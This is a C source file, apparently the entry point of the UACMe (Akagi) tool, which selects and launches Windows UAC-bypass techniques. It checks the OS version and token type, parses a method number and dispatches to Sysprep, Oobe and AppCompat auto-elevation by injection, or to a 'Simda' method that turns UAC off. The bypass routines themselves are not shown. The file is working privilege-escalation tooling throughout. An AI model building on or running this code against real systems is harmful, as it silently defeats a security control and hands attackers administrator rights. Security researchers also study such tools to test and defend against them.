UACME/Source/Akagi/main.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2015
*
*  TITLE:       MAIN.C
*
*  VERSION:     1.10
*
*  DATE:        27 Mar 2015
*
*  Injector entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

#define PROGRAMTITLE TEXT("UACMe")
#define WOW64STRING TEXT("Apparently it seems you are running under WOW64.\n\r\
This is not supported, run x64 version of this tool.")

/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
	BOOL					IsWow64 = FALSE;
	DWORD					bytesIO, dwType;
	WCHAR					szBuffer[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE	ElevType;
	RTL_OSVERSIONINFOW		osver;


	//verify system version
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	RtlGetVersion(&osver);

	if (osver.dwBuildNumber < 7000) {

		MessageBox(GetDesktopWindow(),
			TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);

		goto Done;
	}

	ElevType = TokenElevationTypeDefault;
	if (!supGetElevationType(&ElevType)) {
		goto Done;
	}
	if (ElevType != TokenElevationTypeLimited) {
		MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}


	IsWow64 = supIsProcess32bit(GetCurrentProcess());

	dwType = 0;
	bytesIO = 0;
	RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
	if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
		if (lstrcmpi(szBuffer, TEXT("1")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Sysprep selected\n\r"));
			dwType = METHOD_SYSPREP;
		}
		if (lstrcmpi(szBuffer, TEXT("2")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Sysprep_ex selected\n\r"));
			dwType = METHOD_SYSPREP_EX;
		}
		if (lstrcmpi(szBuffer, TEXT("3")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Oobe selected\n\r"));
			dwType = METHOD_OOBE;
		}
#ifndef _WIN64
		if (lstrcmpi(szBuffer, TEXT("4")) == 0) {
			OutputDebugString(TEXT("[UCM] Method AppCompat selected\n\r"));
			dwType = METHOD_APPCOMPAT;
		}
#endif
		if (lstrcmpi(szBuffer, TEXT("5")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Simda selected\n\r"));
			dwType = METHOD_SIMDA;
		}
	}

	if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
		MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	switch (dwType) {

	case METHOD_SYSPREP:
	case METHOD_SYSPREP_EX:
	case METHOD_OOBE:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBoxW(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (ucmStandardAutoElevation(dwType)) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

//
//  There is no RedirectEXE for x64.
//
#ifndef _WIN64
	case METHOD_APPCOMPAT:
		if (ucmAppcompatElevation()) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif
	case METHOD_SIMDA:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBoxW(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;
	}

Done:
	ExitProcess(0);
}